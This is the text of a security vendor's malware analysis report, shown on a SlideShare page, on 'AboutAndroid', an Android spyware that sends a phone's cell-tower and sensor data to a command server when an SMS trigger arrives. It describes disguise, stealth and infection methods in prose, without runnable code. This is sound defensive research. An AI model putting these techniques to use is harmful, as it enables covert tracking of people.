SlideShare une entreprise Scribd logo

Meet the potnet - AboutAndroid | Malware Analysis Report

Eran Goldstein
Eran Goldstein

AboutAndroid | Malware Analysis Report by Eran Goldstein | Senior Cyber Security & Malware Researcher at ZIMPERIUM

Technologie
1  sur  17
Télécharger pour lire hors ligne
Meet the Potnet Next generation Privacy botnet AboutAndroid | Malware Analysis Report Eran Goldstein Senior Cyber Security & Malware Researcher at ZIMPERIUM
GENERAL NOTES: THE FOLLOWING INFORMATION SUMMERAIZE “POTNETS AND NEXT GENERATION BOTNET TECHNIQUES” RESEARCH PROCESS AND CONTAINS SENSITIVE INFORMATION. THIS PAPER ANALYZES IN DETAILS THE “ABOUTANDROID” ANDROID MALWARE AND BRINGS EVIDENCE THAT MOBILE DEVICES WILL GET MORE AND MORE INFECTED IN A NEAR FUTURE, LEVERAGING SYSTEMS ALREADY USED ON THE FIXED SIDE. WARNING: ABOUTANDROID IS A THREAT FOR BOTH USERS AND ORGANIZATIONS AS IT EXPOSING CLIENT INTO A PRIVACY ISSUES. ALL THE TOOLS AND APPLICATIONS THAT WILL BE DEMONSTRATE IN THIS DOCUMENT DEVELOPED FOR RESEARCH PURPOSES ONLY, IT IS STRONGLY RECOMMENDED THAT YOU DO NOT USE THIS TOOL FOR ILLEGAL PURPOSES. ALL RIGHTS OF THE KEYWORDS “POTNET” AND “POTNETS” AND THEIR DEFINITION ARE REGISTERED AND RESERVED TO THE AUTHOR OF THIS MANUAL. CLARIFICATION: WE WILL NOT BE RESPONSIBLE FOR ANY DAMAGE THAT CAUSED BY USING THE TOOLS, APPLICATION OR TECHNIQUES THAT DEMONSTRATED.
Table of Contents Contents Introduction............................................................................................................................................................4 The next generation of privacy botnet...................................................................................................................5 Suspicious Activity ..................................................................................................................................................6 Analysis ...................................................................................................................................................................7 Malware Sample.............................................................................................................................................8 Infection..........................................................................................................................................................9 Operation......................................................................................................................................................10 Command and Control (C&C) .......................................................................................................................11 Network Impact............................................................................................................................................12 Proof-of-Concept ..................................................................................................................................................13 Conclusions...........................................................................................................................................................16
Introduction Cyber Security researchers discovered a new techniques and methodology of privacy botnet that allows an attacker to gain user’s personal information, detailed location, movement and motion surveillance, area mapping and more. The malware found was designed to work in a stealth mode and running as a receiver behind a system background service. Once the attacker sends an SMS message containing different message body texts (For example: question mark or smiley) to the target device, it will cause the device to send a private information that not required any special permission or dialog's box approval from the victim client. The core functionality and the real advantage of the potnet (or privacy botnet), from an attacker's point of view, is the ability to get different type of data from the victim's device including: cellular network information and other sensor data of the targeted victim. The malware allows an attacker to get an information about the geolocation and the positioning of the target device. This data is calculated on the potnet C&C server and then available to the attacker in order to track the target device's exact motions. Diagram 1.0: Human tracking system
Next generation of privacy botnet Potnet and The Next generation of privacy's botnets are not acting as a banking Trojan or malware and it is not designed to steal your banking credentials, log into your account or transfer your funds to criminals, is the type of malware that’s designed to track your motion, movement and geolocation, so that they can be used for social engineering, advanced positioning and tracking techniques. The Potnet's malware that found essentially doing this by grabbing the victim’s information and send it to certain websites. These websites are pre-specified by the attackers, and they are typically Command and Control (C&C) servers that hosted anonymously in a third-party web hosting service. The data that is collected, then calculated on the server side in order to provide to the attacker an accurate picture about the victim. Utilizing a short processing time on the client side of the malware, data sent to the server minimized, thus reducing the possibility of detection by client side’s defense mechanisms. Using a non-conventional device data allow the attacker to track victims that located at low- connectivity or bad-signal environments like inside buildings and even underground level (according to the cellular data signal). Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments
Suspicious Activity In the next example we are going to explain the suspicious activities of a potnet's malware by code implementation and demonstration of the AboutAndroid.apk malware. The AboutAndroid malware takes the advantage of perfectly legitimate data that can be read without the need for any special permission or dialog approval from the client side, what makes the detection process of potnet's malware to quite difficult. The AboutAndroid malware that analyzed suspicious to the following symptoms and running activities: 1. Ability to obtain a private data from the system without any prior information and without the user’s approval. 2. Ability to obtain a private data from the system without any prior information and without any special permission. 3. Responsible for high energy consumption of the battery. One of the harmful aspects of the potnet's malware family is that when it enters into the target mobile device, it is very difficult to be detected or to know the exact trigger that used in order to send an information or data out from the device. Diagram 1.2: The Cell tower (cellid), Cellphone and the signal
Analysis AboutAndroid malware, logs the user’s sensors and cellular network data. Once executed, the malware generates an incoming broadcast receiver and then waits for a specific SMS text message that contains smiley or question mark as the message text body for example. Once the SMS message arrived, the malware then logs all activities related to a specific sensor data and the cellular network information include the cell id, LAC, MNC, MCC, etc.… and sending them to the potnet C&C server. Sending only a small amount of data to the C&C server at the backend reduces the possibility of detection by client side’s defense mechanisms (like Anti-Viruses or other signature-based protection techniques). This methodology and technique of calculating additional information that related to the victim by correlating the collected data with third-party APIs and other web-services are one of the advantages of potnets and the next generation botnets. Despite of the fact that this kind of attack must use a strong social engineering lure in order to convince the user to click on a malicious link or hope that the user will be tricked into installing an app. Once this is done, the AboutAndroid malware will stay persistent on the victim device and can be triggered via SMS message. Diagram 1.3: Triangulation is calculated according to the signal of every base-station (cell tower)
Malware Sample The diagram below shows the report of an AboutAndroid malware sample that scanned using the VirusTotal service by 56 different antivirus engines and found as clean. In an attempt to looks as not malicious software the AboutAndroid malware is using the namespace of “com.google.aboutandroid”. Diagram 1.4: VirusTotal scan report
Infection Infection of AboutAndroid can be done in different ways. For example, phishing spam can be used to lure the victim to an infected web site, where an embedded <iframe> causes the browser to automatically download a file called AboutAndroid.apk (or any other file). The user must then install it by clicking on the downloaded file and follow the manual installation process. Other techniques can be implemented by using mobile application markets, 3rd party websites or Trojan-Downloaders. Trojan-Downloaders are often distributed as part of the payload of another malware, such as a Trojan-Dropper. Trojan-Downloaders may also be distributed as a file attachment to spam e-mails, you get an e-mail that seems to come from a high-profile company with an attached invoice (for example) in the form of a .doc or a .pdf document. The invoice looks innocuous enough, but here's the catch: It can run a PDF reader exploits or macros in Microsoft Word in order to install the malware. Once installed, there is no application icon on the screen or any user interface to interact with. This is because our malware has installed itself as a background service that only start when the screen is unlocked by the user or when the device is re-booted. The malware service listens for the ON_BOOT or USER_PRESENT intents. The only evidence that the malware is installed is through the “Manage Applications” section of “Settings”. This will show that an application called “com.google.aboutandroid” is running. You can get rid of the infection by uninstalling the application. Diagram 2.0: Installation of AboutAndroid Malware POC
Operation When the malware’s service starts, it registers a broadcast receiver in the background service and a SensorEventListener. Diagram 2.1: The malware register a sensor event listener Once SMS message that contains ":-)" as body text arrived to the device, the app logs the infected device’s sensor values and cellular network's information and then opens up a TCP connection to the primary potnet C&C server. Diagram 2.2: check if the SMS message contains ":-)" as body text
Command and Control (C&C) Despite of the fact that a fairly simple command and control protocol is used to send data over an HTTP connection. The potnet C&C Server compensates and predominantly used to access different API and web services in order to calculate additional information about the physical environment of the victim device and perform a triangulation of the cellid and neighbors network information. Diagram 2.3: The C&C server’s IP address In addition, In order to translate the victim device data into an accurate motion tracking’s valuable information, the C&C server is performing a geometric calculation that correlated with the sensor data that collected. Diagram 2.4: Assign the parameter values and prepare the http request to the C&C server The sensors' data that's collected contains data from more than 7 different sensors includes Barometer Sensor, Proximity Sensor, Linear Acceleration Sensor, Gyroscope Sensor, Temperature Sensor, Gravity Sensor, Light Sensor and more.
Network Impact In the diagram below we can see the HTTP request that arrives from the victim device and intercepted in our burp proxy. We can observe the different parameters that the app sending, For example: client = the client mobile device phone number. cid = the cell id that the mobile device connected to. lac = Local Area Code of the cellular network provider. mnc = Network Code of the cellular base station antenna provider. mcc = Country Code of the cellular base station antenna. signal = the signal of the mobile device from the cellular base station antenna (in dBm). cell_lon = the longitude of the cellular base station antenna (Before triangulation). cell_lat = the latitude of the cellular base station antenna (Before triangulation). Diagram 2.5: Intercepting the request from the victim device to the C&C server
Proof-of-Concept After we launched one of the malware’s hidden intent (activity - not the main one) we can see how it looks at the diagram below. AboutAndroid Malware POC installed on the victim device and we are ready to begin with our simple scenario. Diagram 3.0: AboutAndroid Malware POC – an activity intent launched (not in hidden mode) 1. In order to track the victim, the attacker sends an SMS message with the text of “” to the victim device. Diagram 3.1: The attacker is sending the SMS message
2. The victim gets the SMS message Diagram 3.2: No suspicious activities on the victim device Diagram 3.3: The victim device getting the SMS message 3. The attacker is able now to browse to the AboutAndroid potnet C&C server GUI console and to get all the relevant and valuable information about the victim. Diagram 3.4 AboutAndroid potnet C&C server – part 1: basic information, indicators and the Motion Detection module We can’t observe any suspicious activity on the victim device
In diagram 3.4 we can see that the basic information about our victim includes: Cellular network information, Radio signal related data, the calculation of the device location, “Inside building” indicator, Floor level indicator, etc.… In addition, we can see the Motion Detection module (at the right bottom corner). The Motion Detection module still showing us every exact motion of the victim device, triggered by any new movement of our human target. TIP: It is recommended to search on the internet for the full scenario's movie clip of this proof of concept demonstration in order to see the full features list of this AboutAndroid malware. In diagram 3.5 we can see the calculated data of the victim include triangulation data, base-station measurements and the estimated location of the victim device. Diagram 3.5 AboutAndroid potnet C&C server – part 2: calculated data of the victim
Conclusions It seems that running a standard antivirus sweep will not get rid of AboutAndroid or other potnet’s malwares and since the program doesn't really make its presence known, you may be in trouble if you find that you're already infected with it. If you think you may have become infected by potnet malware, YOU should uninstall any suspicious app that you are not familiar with, otherwise wipe your device and perform a “Factory reset”. In my opinion, potnet malware trying to get an advantage of a victim device by implementation of an incoming broadcast receiver, sensors listeners and other non-conventional techniques’ data, what allows the malware to run in a quite stealth mode as well to get an information from the victim device without any user's interruption or the need for dialog's approval from the client’s side. The AboutAndroid malware runs in the background as a service and its operation is not noticeable to the user. However, it will likely consume considerable battery power when active, which will raise suspicions. On the other hand, users with a capped data plan will not notice to almost any charges changes on their bill. Once a specific app has been detected and signed, most mobile anti-virus products will be able to detect and remove the threat by uninstalling the malicious app. Notes for Android Developers and Google Security Team Giving applications direct access to hardware is dangerous. It is better if permissions will need to address sensor access. In addition, hardware should not provide more than what applications require and provide only an abstractions, not raw data.
http://www.zimperium.com www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes no responsibility for inaccuracies contained herein. Copyright © 2015 ZIMPERIUM Inc. All rights reserved.

Recommandé

Hacking ingress
Hacking ingressHacking ingress
Hacking ingressEran Goldstein
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsEran Goldstein
 
Analyzing the effectivess_and_coverage_of_web_app_scanners
Analyzing the effectivess_and_coverage_of_web_app_scannersAnalyzing the effectivess_and_coverage_of_web_app_scanners
Analyzing the effectivess_and_coverage_of_web_app_scannersLarry Suto
 
Mitigating data theft_in_android
Mitigating data theft_in_androidMitigating data theft_in_android
Mitigating data theft_in_androidRashmi Bhandari
 
Using the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceUsing the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceHitesh Sahu
 
Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Sebastián Guerrero Selma
 
Gremlin Apps & Gremlin Botnets by Chema Alonso
Gremlin Apps & Gremlin Botnets by Chema AlonsoGremlin Apps & Gremlin Botnets by Chema Alonso
Gremlin Apps & Gremlin Botnets by Chema AlonsoTelefónica
 
Web API Security
Web API SecurityWeb API Security
Web API SecurityStefaan
 

Recommandé

Hacking ingress
Hacking ingressHacking ingress
Hacking ingressEran Goldstein
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsEran Goldstein
 
Analyzing the effectivess_and_coverage_of_web_app_scanners
Analyzing the effectivess_and_coverage_of_web_app_scannersAnalyzing the effectivess_and_coverage_of_web_app_scanners
Analyzing the effectivess_and_coverage_of_web_app_scannersLarry Suto
 
Mitigating data theft_in_android
Mitigating data theft_in_androidMitigating data theft_in_android
Mitigating data theft_in_androidRashmi Bhandari
 
Using the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceUsing the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceHitesh Sahu
 
Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Help Doctor, my application is an onion!
Help Doctor, my application is an onion!Sebastián Guerrero Selma
 
Gremlin Apps & Gremlin Botnets by Chema Alonso
Gremlin Apps & Gremlin Botnets by Chema AlonsoGremlin Apps & Gremlin Botnets by Chema Alonso
Gremlin Apps & Gremlin Botnets by Chema AlonsoTelefónica
 
Web API Security
Web API SecurityWeb API Security
Web API SecurityStefaan
 
trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
 
Review on mobile threats and detection techniques
Review on mobile threats and detection techniquesReview on mobile threats and detection techniques
Review on mobile threats and detection techniquesijdpsjournal
 
HinDroid
HinDroidHinDroid
HinDroidHinDroid
 
Cyber Malware Programs And The Internet
Cyber Malware Programs And The InternetCyber Malware Programs And The Internet
Cyber Malware Programs And The InternetHeidi Maestas
 
2nd Class PPT.pptx
2nd Class PPT.pptx2nd Class PPT.pptx
2nd Class PPT.pptxSibyJames1
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiSTO STRATEGY
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet IJECEIAES
 
Guarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkGuarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkEditor IJCATR
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptxbabepa2317
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiYury Chemerkin
 
Network monitoring white paper
Network monitoring white paperNetwork monitoring white paper
Network monitoring white paperImaging Network Technology, LLC
 
Botnet
BotnetBotnet
Botnetlokenra
 
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...IJERA Editor
 
Report on Rogue Security Software: a summary
Report on Rogue Security Software: a summaryReport on Rogue Security Software: a summary
Report on Rogue Security Software: a summarySymantec Italia
 
Types of Malware.docx
Types of Malware.docxTypes of Malware.docx
Types of Malware.docxSarahReese14
 
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...IRJET Journal
 
Malware Applications Development.pptx
Malware Applications Development.pptxMalware Applications Development.pptx
Malware Applications Development.pptxFullstackSRM
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
 
Cyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsCyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsDrPraveenKumar37
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 

Contenu connexe

Similaire à Meet the potnet - AboutAndroid | Malware Analysis Report

trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
 
Review on mobile threats and detection techniques
Review on mobile threats and detection techniquesReview on mobile threats and detection techniques
Review on mobile threats and detection techniquesijdpsjournal
 
Cyber Malware Programs And The Internet
Cyber Malware Programs And The InternetCyber Malware Programs And The Internet
Cyber Malware Programs And The InternetHeidi Maestas
 
2nd Class PPT.pptx
2nd Class PPT.pptx2nd Class PPT.pptx
2nd Class PPT.pptxSibyJames1
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiSTO STRATEGY
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet IJECEIAES
 
Guarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkGuarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkEditor IJCATR
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptxbabepa2317
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiYury Chemerkin
 
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...IJERA Editor
 
Report on Rogue Security Software: a summary
Report on Rogue Security Software: a summaryReport on Rogue Security Software: a summary
Report on Rogue Security Software: a summarySymantec Italia
 
Types of Malware.docx
Types of Malware.docxTypes of Malware.docx
Types of Malware.docxSarahReese14
 
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...IRJET Journal
 
Malware Applications Development.pptx
Malware Applications Development.pptxMalware Applications Development.pptx
Malware Applications Development.pptxFullstackSRM
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
 
Cyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsCyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsDrPraveenKumar37
 

Similaire à Meet the potnet - AboutAndroid | Malware Analysis Report (20)

trojon horse Seminar report
trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
 
IRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET- A Survey on Android Ransomware and its Detection Methods
IRJET- A Survey on Android Ransomware and its Detection Methods
 
Review on mobile threats and detection techniques
Review on mobile threats and detection techniquesReview on mobile threats and detection techniques
Review on mobile threats and detection techniques
 
HinDroid
HinDroidHinDroid
HinDroid
 
Cyber Malware Programs And The Internet
Cyber Malware Programs And The InternetCyber Malware Programs And The Internet
Cyber Malware Programs And The Internet
 
2nd Class PPT.pptx
2nd Class PPT.pptx2nd Class PPT.pptx
2nd Class PPT.pptx
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part ii
 
Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet Invesitigation of Malware and Forensic Tools on Internet
Invesitigation of Malware and Forensic Tools on Internet
 
Guarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social NetworkGuarding Against Large-Scale Scrabble In Social Network
Guarding Against Large-Scale Scrabble In Social Network
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptx
 
When developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part iiWhen developers api simplify user mode rootkits development – part ii
When developers api simplify user mode rootkits development – part ii
 
Network monitoring white paper
Network monitoring white paperNetwork monitoring white paper
Network monitoring white paper
 
Botnet
BotnetBotnet
Botnet
 
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
Client Honeypot Based Drive by Download Exploit Detection and their Categoriz...
 
Report on Rogue Security Software: a summary
Report on Rogue Security Software: a summaryReport on Rogue Security Software: a summary
Report on Rogue Security Software: a summary
 
Types of Malware.docx
Types of Malware.docxTypes of Malware.docx
Types of Malware.docx
 
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
Emotet: A Sophisticated and Persistent Malware for Stealing Information, its ...
 
Malware Applications Development.pptx
Malware Applications Development.pptxMalware Applications Development.pptx
Malware Applications Development.pptx
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 
Cyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering studentsCyber-Security-CIT good for 1st year engineering students
Cyber-Security-CIT good for 1st year engineering students
 

Dernier

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 

Dernier (20)

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Unleash Your Potential - Namagunga Girls Coding Club
